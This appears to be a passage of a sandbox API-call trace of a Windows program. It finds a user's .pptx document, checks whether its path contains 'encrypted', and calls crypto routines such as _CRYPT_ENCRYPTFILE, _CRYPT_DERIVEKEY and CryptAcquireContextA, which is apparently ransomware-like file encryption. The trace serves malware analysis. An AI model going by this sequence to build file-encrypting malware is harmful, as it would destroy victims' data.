[0036.214] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.214] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.214] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.214] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.214] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0036.214] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.214] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.214] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.214] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x535c5c40, ftCreationTime.dwHighDateTime=0x1d5bf6d, ftLastAccessTime.dwLowDateTime=0xf2c4c3b0, ftLastAccessTime.dwHighDateTime=0x1d5c573, ftLastWriteTime.dwLowDateTime=0xf2c4c3b0, ftLastWriteTime.dwHighDateTime=0x1d5c573, nFileSizeHigh=0x0, nFileSizeLow=0x7df0, dwReserved0=0x0, dwReserved1=0x777648, cFileName="JIof8cjEeKxRyV.pptx", cAlternateFileName="JIOF8C~1.PPT")) returned 0x7c20c0 [0036.215] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0036.215] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.215] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x535c5c40, ftCreationTime.dwHighDateTime=0x1d5bf6d, ftLastAccessTime.dwLowDateTime=0xf2c4c3b0, ftLastAccessTime.dwHighDateTime=0x1d5c573, ftLastWriteTime.dwLowDateTime=0xf2c4c3b0, ftLastWriteTime.dwHighDateTime=0x1d5c573, nFileSizeHigh=0x0, nFileSizeLow=0x7df0, dwReserved0=0x0, dwReserved1=0x777648, cFileName="JIof8cjEeKxRyV.pptx", cAlternateFileName="JIOF8C~1.PPT")) returned 0x7c20c0 [0036.215] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0036.215] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.215] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.215] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.215] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.215] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.215] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.215] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.215] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.215] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.215] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.215] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.215] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.215] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.215] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.215] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.215] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.215] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.215] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.215] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.215] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AmAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mAiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AiAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iAINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AINSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NSrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SrD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rD\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JIof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Iof8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="of8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cjEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jEeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EeKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eKxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KxRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xRyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RyV.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.217] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.217] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0036.217] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0036.217] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0036.217] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.217] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.217] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.218] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.218] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.218] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.pptx", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x535c5c40, ftCreationTime.dwHighDateTime=0x1d5bf6d, ftLastAccessTime.dwLowDateTime=0xf2c4c3b0, ftLastAccessTime.dwHighDateTime=0x1d5c573, ftLastWriteTime.dwLowDateTime=0xf2c4c3b0, ftLastWriteTime.dwHighDateTime=0x1d5c573, nFileSizeHigh=0x0, nFileSizeLow=0x7df0, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="JIof8cjEeKxRyV.pptx", cAlternateFileName="JIOF8C~1.PPT")) returned 0x7c2240 [0036.218] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0036.218] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.218] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0036.218] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.218] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.218] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0036.218] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.218] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0036.218] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.218] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.218] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0036.218] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.218] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.218] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.219] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.219] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.219] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0036.219] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.219] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0036.219] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.220] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.220] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0036.220] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.220] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.220] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.220] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.220] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.220] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0036.220] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.220] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.220] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.220] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.220] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.220] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.220] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0036.220] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.220] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.220] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0036.220] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 